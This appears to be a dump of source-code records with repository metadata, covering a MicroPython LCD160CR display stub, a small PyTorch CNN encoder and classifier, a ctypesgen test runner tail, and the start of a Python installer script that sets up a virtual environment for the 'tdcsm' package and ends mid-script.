        argv: optional argument vector for unittest.main(); defaults to
              sys.argv when None.

    Note: unittest.main() calls sys.exit() itself by default, so the
    trailing `return 0` is normally unreachable.
    """
    if argv is None:
        argv = sys.argv
    ctypesgentest.ctypesgen.messages.log.setLevel(logging.CRITICAL)  # do not log anything
    # Fix: forward argv — the original accepted and normalised it but then
    # called unittest.main() with no arguments, silently ignoring it.
    unittest.main(argv=argv)
    return 0
# Script entry point: propagate main()'s result as the process exit status.
if __name__ == "__main__":
    sys.exit(main())
| 58,852 | 5,623 | 790 |
ed6d3463406712dea80304bda0142186ee00fea2 | 16,056 | py | Python | stubs/micropython-latest-docstubs/lcd160cr.py | mattytrentini/micropython-stubs | 4d596273823b69e9e5bcf5fa67f249c374ee0bbc | [
"MIT"
] | null | null | null | stubs/micropython-latest-docstubs/lcd160cr.py | mattytrentini/micropython-stubs | 4d596273823b69e9e5bcf5fa67f249c374ee0bbc | [
"MIT"
] | null | null | null | stubs/micropython-latest-docstubs/lcd160cr.py | mattytrentini/micropython-stubs | 4d596273823b69e9e5bcf5fa67f249c374ee0bbc | [
"MIT"
] | null | null | null | """
control of LCD160CR display. See: https://docs.micropython.org/en/latest/library/lcd160cr.html
This module provides control of the MicroPython LCD160CR display.
"""
# source version: latest
# origin module:: micropython/docs/library/lcd160cr.rst
from typing import Any, Tuple
from .machine import SPI
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
PORTRAIT: Any
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
LANDSCAPE: Any
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
PORTRAIT_UPSIDEDOWN: Any
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
LANDSCAPE_UPSIDEDOWN: Any
# Types of start-up decoration, can be OR'ed together, used by
# :meth:`LCD160CR.set_startup_deco`.
STARTUP_DECO_NONE: Any
# Types of start-up decoration, can be OR'ed together, used by
# :meth:`LCD160CR.set_startup_deco`.
STARTUP_DECO_MLOGO: Any
# Types of start-up decoration, can be OR'ed together, used by
# :meth:`LCD160CR.set_startup_deco`.
STARTUP_DECO_INFO: Any
class LCD160CR:
"""
Construct an LCD160CR object. The parameters are:
- *connect* is a string specifying the physical connection of the LCD
display to the board; valid values are "X", "Y", "XY", "YX".
Use "X" when the display is connected to a pyboard in the X-skin
position, and "Y" when connected in the Y-skin position. "XY"
and "YX" are used when the display is connected to the right or
left side of the pyboard, respectively.
- *pwr* is a Pin object connected to the LCD's power/enabled pin.
- *i2c* is an I2C object connected to the LCD's I2C interface.
- *spi* is an SPI object connected to the LCD's SPI interface.
- *i2c_addr* is the I2C address of the display.
One must specify either a valid *connect* or all of *pwr*, *i2c* and *spi*.
If a valid *connect* is given then any of *pwr*, *i2c* or *spi* which are
not passed as parameters (i.e. they are ``None``) will be created based on the
value of *connect*. This allows to override the default interface to the
display if needed.
The default values are:
- "X" is for the X-skin and uses:
``pwr=Pin("X4")``, ``i2c=I2C("X")``, ``spi=SPI("X")``
- "Y" is for the Y-skin and uses:
``pwr=Pin("Y4")``, ``i2c=I2C("Y")``, ``spi=SPI("Y")``
- "XY" is for the right-side and uses:
``pwr=Pin("X4")``, ``i2c=I2C("Y")``, ``spi=SPI("X")``
- "YX" is for the left-side and uses:
``pwr=Pin("Y4")``, ``i2c=I2C("X")``, ``spi=SPI("Y")``
See `this image <http://micropython.org/resources/LCD160CRv10-positions.jpg>`_
for how the display can be connected to the pyboard.
"""
w: Any
# The width and height of the display, respectively, in pixels. These
# members are updated when calling :meth:`LCD160CR.set_orient` and should
# be considered read-only.
h: Any
@staticmethod
def rgb(r, g, b) -> int:
"""
Return a 16-bit integer representing the given rgb color values. The
16-bit value can be used to set the font color (see
:meth:`LCD160CR.set_text_color`) pen color (see :meth:`LCD160CR.set_pen`)
and draw individual pixels.
"""
...
@staticmethod
def clip_line(data, w, h) -> Any:
"""
Clip the given line data. This is for internal use.
"""
...
def set_power(self, on) -> None:
"""
Turn the display on or off, depending on the given value of *on*: 0 or ``False``
will turn the display off, and 1 or ``True`` will turn it on.
"""
...
def set_orient(self, orient) -> None:
"""
Set the orientation of the display. The *orient* parameter can be one
of `PORTRAIT`, `LANDSCAPE`, `PORTRAIT_UPSIDEDOWN`, `LANDSCAPE_UPSIDEDOWN`.
"""
...
def set_brightness(self, value) -> None:
"""
Set the brightness of the display, between 0 and 31.
"""
...
def set_i2c_addr(self, addr) -> None:
"""
Set the I2C address of the display. The *addr* value must have the
lower 2 bits cleared.
"""
...
def set_uart_baudrate(self, baudrate) -> None:
"""
Set the baudrate of the UART interface.
"""
...
def set_startup_deco(self, value) -> None:
"""
Set the start-up decoration of the display. The *value* parameter can be a
logical or of `STARTUP_DECO_NONE`, `STARTUP_DECO_MLOGO`, `STARTUP_DECO_INFO`.
"""
...
def save_to_flash(self) -> Any:
"""
Save the following parameters to flash so they persist on restart and power up:
initial decoration, orientation, brightness, UART baud rate, I2C address.
"""
...
def set_pixel(self, x, y, c) -> None:
"""
Set the specified pixel to the given color. The color should be a 16-bit
integer and can be created by :meth:`LCD160CR.rgb`.
"""
...
def get_pixel(self, x, y) -> Any:
"""
Get the 16-bit value of the specified pixel.
"""
...
def get_line(self, x, y, buf) -> Any:
"""
Low-level method to get a line of pixels into the given buffer.
To read *n* pixels *buf* should be *2*n+1* bytes in length. The first byte
is a dummy byte and should be ignored, and subsequent bytes represent the
pixels in the line starting at coordinate *(x, y)*.
"""
...
def screen_dump(self, buf, x=0, y=0, w=None, h=None) -> Any:
"""
Dump the contents of the screen to the given buffer. The parameters *x* and *y*
specify the starting coordinate, and *w* and *h* the size of the region. If *w*
or *h* are ``None`` then they will take on their maximum values, set by the size
of the screen minus the given *x* and *y* values. *buf* should be large enough
to hold ``2*w*h`` bytes. If it's smaller then only the initial horizontal lines
will be stored.
"""
...
def screen_load(self, buf) -> None:
"""
Load the entire screen from the given buffer.
"""
...
def set_pos(self, x, y) -> None:
"""
Set the position for text output using :meth:`LCD160CR.write`. The position
is the upper-left corner of the text.
"""
...
def set_text_color(self, fg, bg) -> None:
"""
Set the foreground and background color of the text.
"""
...
def set_font(self, font, scale=0, bold=0, trans=0, scroll=0) -> None:
"""
Set the font for the text. Subsequent calls to `write` will use the newly
configured font. The parameters are:
- *font* is the font family to use, valid values are 0, 1, 2, 3.
- *scale* is a scaling value for each character pixel, where the pixels
are drawn as a square with side length equal to *scale + 1*. The value
can be between 0 and 63.
- *bold* controls the number of pixels to overdraw each character pixel,
making a bold effect. The lower 2 bits of *bold* are the number of
pixels to overdraw in the horizontal direction, and the next 2 bits are
for the vertical direction. For example, a *bold* value of 5 will
overdraw 1 pixel in both the horizontal and vertical directions.
- *trans* can be either 0 or 1 and if set to 1 the characters will be
drawn with a transparent background.
- *scroll* can be either 0 or 1 and if set to 1 the display will do a
soft scroll if the text moves to the next line.
"""
...
def write(self, s) -> None:
"""
Write text to the display, using the current position, color and font.
As text is written the position is automatically incremented. The
display supports basic VT100 control codes such as newline and backspace.
"""
...
def set_pen(self, line, fill) -> None:
"""
Set the line and fill color for primitive shapes.
"""
...
def erase(self) -> Any:
"""
Erase the entire display to the pen fill color.
"""
...
def dot(self, x, y) -> None:
"""
Draw a single pixel at the given location using the pen line color.
"""
...
def rect_interior(self, x, y, w, h) -> None:
"""
Draw a rectangle at the given location and size using the pen line
color for the outline, and the pen fill color for the interior.
The `rect` method draws the outline and interior, while the other methods
just draw one or the other.
"""
...
def line(self, x1, y1, x2, y2) -> None:
"""
Draw a line between the given coordinates using the pen line color.
"""
...
def line_no_clip(self, x1, y1, x2, y2) -> Any:
"""
These methods are as above but don't do any clipping on the input
coordinates. They are faster than the clipping versions and can be
used when you know that the coordinates are within the display.
"""
...
def poly_dot(self, data) -> None:
"""
Draw a sequence of dots using the pen line color.
The *data* should be a buffer of bytes, with each successive pair of
bytes corresponding to coordinate pairs (x, y).
"""
...
def poly_line(self, data) -> Any:
"""
Similar to :meth:`LCD160CR.poly_dot` but draws lines between the dots.
"""
...
def touch_config(self, calib=False, save=False, irq=None) -> None:
"""
Configure the touch panel:
- If *calib* is ``True`` then the call will trigger a touch calibration of
the resistive touch sensor. This requires the user to touch various
parts of the screen.
- If *save* is ``True`` then the touch parameters will be saved to NVRAM
to persist across reset/power up.
- If *irq* is ``True`` then the display will be configured to pull the IRQ
line low when a touch force is detected. If *irq* is ``False`` then this
feature is disabled. If *irq* is ``None`` (the default value) then no
change is made to this setting.
"""
...
def is_touched(self) -> bool:
"""
Returns a boolean: ``True`` if there is currently a touch force on the screen,
``False`` otherwise.
"""
...
def get_touch(self) -> Tuple:
"""
Returns a 3-tuple of: *(active, x, y)*. If there is currently a touch force
on the screen then *active* is 1, otherwise it is 0. The *x* and *y* values
indicate the position of the current or most recent touch.
"""
...
def set_spi_win(self, x, y, w, h) -> None:
"""
Set the window that SPI data is written to.
"""
...
def fast_spi(self, flush=True) -> SPI:
"""
Ready the display to accept RGB pixel data on the SPI bus, resetting the location
of the first byte to go to the top-left corner of the window set by
:meth:`LCD160CR.set_spi_win`.
The method returns an SPI object which can be used to write the pixel data.
Pixels should be sent as 16-bit RGB values in the 5-6-5 format. The destination
counter will increase as data is sent, and data can be sent in arbitrary sized
chunks. Once the destination counter reaches the end of the window specified by
:meth:`LCD160CR.set_spi_win` it will wrap around to the top-left corner of that window.
"""
...
def show_framebuf(self, buf) -> None:
"""
Show the given buffer on the display. *buf* should be an array of bytes containing
the 16-bit RGB values for the pixels, and they will be written to the area
specified by :meth:`LCD160CR.set_spi_win`, starting from the top-left corner.
The `framebuf <framebuf.html>`_ module can be used to construct frame buffers
and provides drawing primitives. Using a frame buffer will improve
performance of animations when compared to drawing directly to the screen.
"""
...
def set_scroll(self, on) -> None:
"""
Turn scrolling on or off. This controls globally whether any window regions will
scroll.
"""
...
def set_scroll_win(self, win, x=-1, y=0, w=0, h=0, vec=0, pat=0, fill=0x07E0, color=0) -> None:
"""
Configure a window region for scrolling:
- *win* is the window id to configure. There are 0..7 standard windows for
general purpose use. Window 8 is the text scroll window (the ticker).
- *x*, *y*, *w*, *h* specify the location of the window in the display.
- *vec* specifies the direction and speed of scroll: it is a 16-bit value
of the form ``0bF.ddSSSSSSSSSSSS``. *dd* is 0, 1, 2, 3 for +x, +y, -x,
-y scrolling. *F* sets the speed format, with 0 meaning that the window
is shifted *S % 256* pixel every frame, and 1 meaning that the window
is shifted 1 pixel every *S* frames.
- *pat* is a 16-bit pattern mask for the background.
- *fill* is the fill color.
- *color* is the extra color, either of the text or pattern foreground.
"""
...
def set_scroll_win_param(self, win, param, value) -> Any:
"""
Set a single parameter of a scrolling window region:
- *win* is the window id, 0..8.
- *param* is the parameter number to configure, 0..7, and corresponds
to the parameters in the `set_scroll_win` method.
- *value* is the value to set.
"""
...
def set_scroll_buf(self, s) -> None:
"""
Set the string for scrolling in window 8. The parameter *s* must be a string
with length 32 or less.
"""
...
def jpeg(self, buf) -> None:
"""
Display a JPEG. *buf* should contain the entire JPEG data. JPEG data should
not include EXIF information. The following encodings are supported: Baseline
DCT, Huffman coding, 8 bits per sample, 3 color components, YCbCr4:2:2.
The origin of the JPEG is set by :meth:`LCD160CR.set_pos`.
"""
...
def jpeg_data(self, buf) -> None:
"""
Display a JPEG with the data split across multiple buffers. There must be
a single call to `jpeg_start` to begin with, specifying the total number of
bytes in the JPEG. Then this number of bytes must be transferred to the
display using one or more calls to the `jpeg_data` command.
"""
...
def feed_wdt(self) -> Any:
"""
The first call to this method will start the display's internal watchdog
timer. Subsequent calls will feed the watchdog. The timeout is roughly 30
seconds.
"""
...
def reset(self) -> None:
"""
Reset the display.
"""
...
| 36.995392 | 99 | 0.587506 | """
control of LCD160CR display. See: https://docs.micropython.org/en/latest/library/lcd160cr.html
This module provides control of the MicroPython LCD160CR display.
"""
# source version: latest
# origin module:: micropython/docs/library/lcd160cr.rst
from typing import Any, Tuple
from .machine import SPI
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
PORTRAIT: Any
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
LANDSCAPE: Any
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
PORTRAIT_UPSIDEDOWN: Any
# Orientations of the display, used by :meth:`LCD160CR.set_orient`.
LANDSCAPE_UPSIDEDOWN: Any
# Types of start-up decoration, can be OR'ed together, used by
# :meth:`LCD160CR.set_startup_deco`.
STARTUP_DECO_NONE: Any
# Types of start-up decoration, can be OR'ed together, used by
# :meth:`LCD160CR.set_startup_deco`.
STARTUP_DECO_MLOGO: Any
# Types of start-up decoration, can be OR'ed together, used by
# :meth:`LCD160CR.set_startup_deco`.
STARTUP_DECO_INFO: Any
class LCD160CR:
"""
Construct an LCD160CR object. The parameters are:
- *connect* is a string specifying the physical connection of the LCD
display to the board; valid values are "X", "Y", "XY", "YX".
Use "X" when the display is connected to a pyboard in the X-skin
position, and "Y" when connected in the Y-skin position. "XY"
and "YX" are used when the display is connected to the right or
left side of the pyboard, respectively.
- *pwr* is a Pin object connected to the LCD's power/enabled pin.
- *i2c* is an I2C object connected to the LCD's I2C interface.
- *spi* is an SPI object connected to the LCD's SPI interface.
- *i2c_addr* is the I2C address of the display.
One must specify either a valid *connect* or all of *pwr*, *i2c* and *spi*.
If a valid *connect* is given then any of *pwr*, *i2c* or *spi* which are
not passed as parameters (i.e. they are ``None``) will be created based on the
value of *connect*. This allows to override the default interface to the
display if needed.
The default values are:
- "X" is for the X-skin and uses:
``pwr=Pin("X4")``, ``i2c=I2C("X")``, ``spi=SPI("X")``
- "Y" is for the Y-skin and uses:
``pwr=Pin("Y4")``, ``i2c=I2C("Y")``, ``spi=SPI("Y")``
- "XY" is for the right-side and uses:
``pwr=Pin("X4")``, ``i2c=I2C("Y")``, ``spi=SPI("X")``
- "YX" is for the left-side and uses:
``pwr=Pin("Y4")``, ``i2c=I2C("X")``, ``spi=SPI("Y")``
See `this image <http://micropython.org/resources/LCD160CRv10-positions.jpg>`_
for how the display can be connected to the pyboard.
"""
w: Any
# The width and height of the display, respectively, in pixels. These
# members are updated when calling :meth:`LCD160CR.set_orient` and should
# be considered read-only.
h: Any
def __init__(self, connect=None, *, pwr=None, i2c=None, spi=None, i2c_addr=98) -> None:
...
@staticmethod
def rgb(r, g, b) -> int:
"""
Return a 16-bit integer representing the given rgb color values. The
16-bit value can be used to set the font color (see
:meth:`LCD160CR.set_text_color`) pen color (see :meth:`LCD160CR.set_pen`)
and draw individual pixels.
"""
...
@staticmethod
def clip_line(data, w, h) -> Any:
"""
Clip the given line data. This is for internal use.
"""
...
def set_power(self, on) -> None:
"""
Turn the display on or off, depending on the given value of *on*: 0 or ``False``
will turn the display off, and 1 or ``True`` will turn it on.
"""
...
def set_orient(self, orient) -> None:
"""
Set the orientation of the display. The *orient* parameter can be one
of `PORTRAIT`, `LANDSCAPE`, `PORTRAIT_UPSIDEDOWN`, `LANDSCAPE_UPSIDEDOWN`.
"""
...
def set_brightness(self, value) -> None:
"""
Set the brightness of the display, between 0 and 31.
"""
...
def set_i2c_addr(self, addr) -> None:
"""
Set the I2C address of the display. The *addr* value must have the
lower 2 bits cleared.
"""
...
def set_uart_baudrate(self, baudrate) -> None:
"""
Set the baudrate of the UART interface.
"""
...
def set_startup_deco(self, value) -> None:
"""
Set the start-up decoration of the display. The *value* parameter can be a
logical or of `STARTUP_DECO_NONE`, `STARTUP_DECO_MLOGO`, `STARTUP_DECO_INFO`.
"""
...
def save_to_flash(self) -> Any:
"""
Save the following parameters to flash so they persist on restart and power up:
initial decoration, orientation, brightness, UART baud rate, I2C address.
"""
...
def set_pixel(self, x, y, c) -> None:
"""
Set the specified pixel to the given color. The color should be a 16-bit
integer and can be created by :meth:`LCD160CR.rgb`.
"""
...
def get_pixel(self, x, y) -> Any:
"""
Get the 16-bit value of the specified pixel.
"""
...
def get_line(self, x, y, buf) -> Any:
"""
Low-level method to get a line of pixels into the given buffer.
To read *n* pixels *buf* should be *2*n+1* bytes in length. The first byte
is a dummy byte and should be ignored, and subsequent bytes represent the
pixels in the line starting at coordinate *(x, y)*.
"""
...
def screen_dump(self, buf, x=0, y=0, w=None, h=None) -> Any:
"""
Dump the contents of the screen to the given buffer. The parameters *x* and *y*
specify the starting coordinate, and *w* and *h* the size of the region. If *w*
or *h* are ``None`` then they will take on their maximum values, set by the size
of the screen minus the given *x* and *y* values. *buf* should be large enough
to hold ``2*w*h`` bytes. If it's smaller then only the initial horizontal lines
will be stored.
"""
...
def screen_load(self, buf) -> None:
"""
Load the entire screen from the given buffer.
"""
...
def set_pos(self, x, y) -> None:
"""
Set the position for text output using :meth:`LCD160CR.write`. The position
is the upper-left corner of the text.
"""
...
def set_text_color(self, fg, bg) -> None:
"""
Set the foreground and background color of the text.
"""
...
def set_font(self, font, scale=0, bold=0, trans=0, scroll=0) -> None:
"""
Set the font for the text. Subsequent calls to `write` will use the newly
configured font. The parameters are:
- *font* is the font family to use, valid values are 0, 1, 2, 3.
- *scale* is a scaling value for each character pixel, where the pixels
are drawn as a square with side length equal to *scale + 1*. The value
can be between 0 and 63.
- *bold* controls the number of pixels to overdraw each character pixel,
making a bold effect. The lower 2 bits of *bold* are the number of
pixels to overdraw in the horizontal direction, and the next 2 bits are
for the vertical direction. For example, a *bold* value of 5 will
overdraw 1 pixel in both the horizontal and vertical directions.
- *trans* can be either 0 or 1 and if set to 1 the characters will be
drawn with a transparent background.
- *scroll* can be either 0 or 1 and if set to 1 the display will do a
soft scroll if the text moves to the next line.
"""
...
def write(self, s) -> None:
"""
Write text to the display, using the current position, color and font.
As text is written the position is automatically incremented. The
display supports basic VT100 control codes such as newline and backspace.
"""
...
def set_pen(self, line, fill) -> None:
"""
Set the line and fill color for primitive shapes.
"""
...
def erase(self) -> Any:
"""
Erase the entire display to the pen fill color.
"""
...
def dot(self, x, y) -> None:
"""
Draw a single pixel at the given location using the pen line color.
"""
...
def rect(self, x, y, w, h) -> Any:
...
def rect_outline(self, x, y, w, h) -> Any:
...
def rect_interior(self, x, y, w, h) -> None:
"""
Draw a rectangle at the given location and size using the pen line
color for the outline, and the pen fill color for the interior.
The `rect` method draws the outline and interior, while the other methods
just draw one or the other.
"""
...
def line(self, x1, y1, x2, y2) -> None:
"""
Draw a line between the given coordinates using the pen line color.
"""
...
def dot_no_clip(self, x, y) -> Any:
...
def rect_no_clip(self, x, y, w, h) -> Any:
...
def rect_outline_no_clip(self, x, y, w, h) -> Any:
...
def rect_interior_no_clip(self, x, y, w, h) -> Any:
...
def line_no_clip(self, x1, y1, x2, y2) -> Any:
"""
These methods are as above but don't do any clipping on the input
coordinates. They are faster than the clipping versions and can be
used when you know that the coordinates are within the display.
"""
...
def poly_dot(self, data) -> None:
"""
Draw a sequence of dots using the pen line color.
The *data* should be a buffer of bytes, with each successive pair of
bytes corresponding to coordinate pairs (x, y).
"""
...
def poly_line(self, data) -> Any:
"""
Similar to :meth:`LCD160CR.poly_dot` but draws lines between the dots.
"""
...
def touch_config(self, calib=False, save=False, irq=None) -> None:
"""
Configure the touch panel:
- If *calib* is ``True`` then the call will trigger a touch calibration of
the resistive touch sensor. This requires the user to touch various
parts of the screen.
- If *save* is ``True`` then the touch parameters will be saved to NVRAM
to persist across reset/power up.
- If *irq* is ``True`` then the display will be configured to pull the IRQ
line low when a touch force is detected. If *irq* is ``False`` then this
feature is disabled. If *irq* is ``None`` (the default value) then no
change is made to this setting.
"""
...
def is_touched(self) -> bool:
"""
Returns a boolean: ``True`` if there is currently a touch force on the screen,
``False`` otherwise.
"""
...
def get_touch(self) -> Tuple:
"""
Returns a 3-tuple of: *(active, x, y)*. If there is currently a touch force
on the screen then *active* is 1, otherwise it is 0. The *x* and *y* values
indicate the position of the current or most recent touch.
"""
...
def set_spi_win(self, x, y, w, h) -> None:
"""
Set the window that SPI data is written to.
"""
...
def fast_spi(self, flush=True) -> SPI:
"""
Ready the display to accept RGB pixel data on the SPI bus, resetting the location
of the first byte to go to the top-left corner of the window set by
:meth:`LCD160CR.set_spi_win`.
The method returns an SPI object which can be used to write the pixel data.
Pixels should be sent as 16-bit RGB values in the 5-6-5 format. The destination
counter will increase as data is sent, and data can be sent in arbitrary sized
chunks. Once the destination counter reaches the end of the window specified by
:meth:`LCD160CR.set_spi_win` it will wrap around to the top-left corner of that window.
"""
...
def show_framebuf(self, buf) -> None:
"""
Show the given buffer on the display. *buf* should be an array of bytes containing
the 16-bit RGB values for the pixels, and they will be written to the area
specified by :meth:`LCD160CR.set_spi_win`, starting from the top-left corner.
The `framebuf <framebuf.html>`_ module can be used to construct frame buffers
and provides drawing primitives. Using a frame buffer will improve
performance of animations when compared to drawing directly to the screen.
"""
...
def set_scroll(self, on) -> None:
"""
Turn scrolling on or off. This controls globally whether any window regions will
scroll.
"""
...
def set_scroll_win(self, win, x=-1, y=0, w=0, h=0, vec=0, pat=0, fill=0x07E0, color=0) -> None:
"""
Configure a window region for scrolling:
- *win* is the window id to configure. There are 0..7 standard windows for
general purpose use. Window 8 is the text scroll window (the ticker).
- *x*, *y*, *w*, *h* specify the location of the window in the display.
- *vec* specifies the direction and speed of scroll: it is a 16-bit value
of the form ``0bF.ddSSSSSSSSSSSS``. *dd* is 0, 1, 2, 3 for +x, +y, -x,
-y scrolling. *F* sets the speed format, with 0 meaning that the window
is shifted *S % 256* pixel every frame, and 1 meaning that the window
is shifted 1 pixel every *S* frames.
- *pat* is a 16-bit pattern mask for the background.
- *fill* is the fill color.
- *color* is the extra color, either of the text or pattern foreground.
"""
...
def set_scroll_win_param(self, win, param, value) -> Any:
"""
Set a single parameter of a scrolling window region:
- *win* is the window id, 0..8.
- *param* is the parameter number to configure, 0..7, and corresponds
to the parameters in the `set_scroll_win` method.
- *value* is the value to set.
"""
...
def set_scroll_buf(self, s) -> None:
"""
Set the string for scrolling in window 8. The parameter *s* must be a string
with length 32 or less.
"""
...
def jpeg(self, buf) -> None:
"""
Display a JPEG. *buf* should contain the entire JPEG data. JPEG data should
not include EXIF information. The following encodings are supported: Baseline
DCT, Huffman coding, 8 bits per sample, 3 color components, YCbCr4:2:2.
The origin of the JPEG is set by :meth:`LCD160CR.set_pos`.
"""
...
def jpeg_start(self, total_len) -> Any:
...
def jpeg_data(self, buf) -> None:
"""
Display a JPEG with the data split across multiple buffers. There must be
a single call to `jpeg_start` to begin with, specifying the total number of
bytes in the JPEG. Then this number of bytes must be transferred to the
display using one or more calls to the `jpeg_data` command.
"""
...
def feed_wdt(self) -> Any:
"""
The first call to this method will start the display's internal watchdog
timer. Subsequent calls will feed the watchdog. The timeout is roughly 30
seconds.
"""
...
def reset(self) -> None:
"""
Reset the display.
"""
...
| 308 | 0 | 216 |
e7dbbf31cdb2c338a7b379e15fa035c48dea2d84 | 1,491 | py | Python | models/cnn/covnet4.py | pmwaniki/ppg-analysis | ae1c76ca8b0eb95a51e3f48eccb8d0a76e7abfbf | [
"MIT"
] | 2 | 2022-02-23T05:36:48.000Z | 2022-03-04T11:53:29.000Z | models/cnn/covnet4.py | pmwaniki/ppg-analysis | ae1c76ca8b0eb95a51e3f48eccb8d0a76e7abfbf | [
"MIT"
] | null | null | null | models/cnn/covnet4.py | pmwaniki/ppg-analysis | ae1c76ca8b0eb95a51e3f48eccb8d0a76e7abfbf | [
"MIT"
] | 1 | 2022-01-15T03:31:30.000Z | 2022-01-15T03:31:30.000Z |
import torch.nn as nn
import torch
import torch.nn.functional as F
# net=Convnet4(2,64,z_dim=32)
# t=torch.randn((5,2,320,300))
# output=net(t)
# output.shape
| 26.157895 | 57 | 0.625084 |
import torch.nn as nn
import torch
import torch.nn.functional as F
def convblock(in_channels, out_channels, pooling=True):
    """Return a BatchNorm -> 3x3 Conv -> ReLU block, optionally max-pooled.

    Args:
        in_channels: number of channels of the incoming feature map.
        out_channels: number of output channels of the 3x3 convolution.
        pooling: if True, append ``nn.MaxPool2d(2)``, halving both spatial
            dimensions; if False, the spatial size is unchanged.

    Returns:
        nn.Sequential: the assembled block.
    """
    # The two original branches duplicated the BatchNorm/Conv/ReLU body and
    # differed only in the trailing pool; build the layer list once instead.
    layers = [
        nn.BatchNorm2d(in_channels),
        # padding=1 with a 3x3 kernel preserves height and width.
        nn.Conv2d(in_channels, out_channels, 3, padding=1),
        nn.ReLU(),
    ]
    if pooling:
        layers.append(nn.MaxPool2d(2))
    return nn.Sequential(*layers)
class Convnet4(nn.Module):
    """Small convolutional encoder producing one ``z_dim`` vector per image.

    Two ``convblock`` stages followed by global average pooling over the
    spatial dimensions, so the output shape is ``(batch, z_dim)``.
    """

    def __init__(self, in_features, hid_dim=64, z_dim=64):
        super().__init__()
        stage_one = convblock(in_features, hid_dim, pooling=False)
        stage_two = convblock(hid_dim, z_dim, pooling=True)
        self.encoder = nn.Sequential(stage_one, stage_two)

    def forward(self, x):
        features = self.encoder(x)
        # Global average pooling over height (dim 2) and width (dim 3).
        return features.mean(dim=(2, 3))
# net=Convnet4(2,64,z_dim=32)
# t=torch.randn((5,2,320,300))
# output=net(t)
# output.shape
class Classifier(nn.Module):
    """Binary classification head on top of a ``Convnet4`` encoder.

    Maps the ReLU-activated embedding through a 512-unit hidden layer down
    to a single output value.
    """

    def __init__(self, in_features, hid_dim, z_dim):
        super().__init__()
        self.encoder = Convnet4(in_features, hid_dim, z_dim)
        self.dense1 = nn.Linear(z_dim, 512)
        self.dense2 = nn.Linear(512, 1)

    def forward(self, x):
        embedding = F.relu(self.encoder(x))
        hidden = F.relu(self.dense1(embedding))
        # Raw score; no activation is applied to the final layer here.
        return self.dense2(hidden)
| 1,142 | 12 | 174 |
0d32eda95a14559f5e27b04ec1d3aaa58203600c | 2,891 | py | Python | tdcsm-install.py | tdcoa/usage | 408091f77360fe29e14186b60746fd7d60713e42 | [
"MIT"
] | null | null | null | tdcsm-install.py | tdcoa/usage | 408091f77360fe29e14186b60746fd7d60713e42 | [
"MIT"
] | 4 | 2020-07-21T18:42:22.000Z | 2020-10-14T00:50:45.000Z | tdcsm-install.py | tdcoa/usage | 408091f77360fe29e14186b60746fd7d60713e42 | [
"MIT"
] | 1 | 2020-08-05T20:09:41.000Z | 2020-08-05T20:09:41.000Z | #! /usr/bin/env python
import sys
def check_python():
"Check if the correct python version is installed"
if sys.version_info < (3, 0):
raise SystemExit("Python2 is not supported. Try rerunning with python3 or download the latest **64-bit** version from https://www.python.org/downloads/")
if sys.maxsize <= 2**32:
raise SystemExit("Only Python **64-bit** version is supported. Please uninstall the current version and install the latest Python3 64-bit version")
if sys.version_info < (3, 8, 0):
raise SystemExit("Python version %d.%d.%d is unsupported. Please upgrade to a version >= 3.8.0" % (sys.version_info[:3]))
try:
import tkinter
tcl_tk_installed = True
except ImportError:
tcl_tk_installed = False
if not tcl_tk_installed:
raise SystemExit("Python isn't installed with Tcl/Tk support enabled")
if __name__ == "__main__":
main()
| 29.20202 | 155 | 0.667589 | #! /usr/bin/env python
import sys
def check_python():
    """Abort with a SystemExit unless this is 64-bit Python >= 3.8 with Tcl/Tk."""
    version = sys.version_info
    if version < (3, 0):
        raise SystemExit("Python2 is not supported. Try rerunning with python3 or download the latest **64-bit** version from https://www.python.org/downloads/")
    # sys.maxsize is 2**31 - 1 on 32-bit builds, far larger on 64-bit ones.
    if sys.maxsize <= 2**32:
        raise SystemExit("Only Python **64-bit** version is supported. Please uninstall the current version and install the latest Python3 64-bit version")
    if version < (3, 8, 0):
        raise SystemExit("Python version %d.%d.%d is unsupported. Please upgrade to a version >= 3.8.0" % (version[:3]))
    try:
        import tkinter  # noqa: F401 -- imported only to probe for Tcl/Tk support
    except ImportError:
        raise SystemExit("Python isn't installed with Tcl/Tk support enabled")
def venv_base():
    """Return the directory holding the tdcsm virtual environment (~/.py/tdcsm)."""
    from pathlib import Path
    home = Path.home()
    return home.joinpath(".py", "tdcsm")
def venv_bin(exec="python"):
    """Return the path of executable *exec* inside the tdcsm virtual environment.

    Windows venvs keep executables in ``Scripts`` with an ``.exe`` suffix;
    POSIX venvs use ``bin``. (The parameter name ``exec`` shadows the builtin
    but is kept for call-site compatibility.)
    """
    from platform import system
    base = venv_base()
    if system() == "Windows":
        return base / "Scripts" / f"{exec}.exe"
    return base / "bin" / exec
def run(*args):
    """Echo *args* as a command line, then execute it via subprocess.

    The child's exit status is not checked; its output goes straight to
    the console.
    """
    import subprocess
    command_line = " ".join(args)
    print(f"Running: '{command_line}'...", flush=True, end='')
    subprocess.run(args)
    print("done")
def create_venv():
    """Create the tdcsm virtual environment and upgrade pip/wheel inside it.

    If the venv's python already exists, log a warning and do nothing.
    """
    from logging import getLogger
    python_path = venv_bin()
    if python_path.exists():
        getLogger().warning(f"Found '{python_path}', skipping recreating virtual environment")
        return
    base = venv_base()
    base.mkdir(parents=True, exist_ok=True)
    run(sys.executable, "-m", "venv", str(base))
    run(str(python_path), "-m", "pip", "install", "--upgrade", "pip", "wheel")
def install_tdcsm():
    """Install or upgrade the ``tdcsm`` package inside the virtual environment."""
    run(str(venv_bin()), "-m", "pip", "install", "--upgrade", "tdcsm")
def create_shortcut():
    """Write double-clickable launcher scripts for tdcsm.

    Drops a ``tdcsm-cmd`` script into ``~/tdcsm`` and onto the desktop
    folder(s); the script upgrades tdcsm inside its venv and launches the
    GUI from ``~/tdcsm``.
    """
    from platform import system
    from pathlib import Path
    import stat
    from textwrap import dedent
    print("Creating a desktop shortcut...", flush=True, end='')
    home = Path.home()
    work_dir = home / 'tdcsm'
    work_dir.mkdir(exist_ok=True)
    python_path = venv_bin()
    if system() == "Windows":
        # Plain Desktop plus the OneDrive-redirected Desktop, when present.
        desktops = filter(Path.exists, (home / d / "Desktop" for d in ['.', 'OneDrive - Teradata']))
        locations = [work_dir, *desktops]
        sfx = 'bat'
        tdcsm_cmd = dedent(f"""\
@echo off
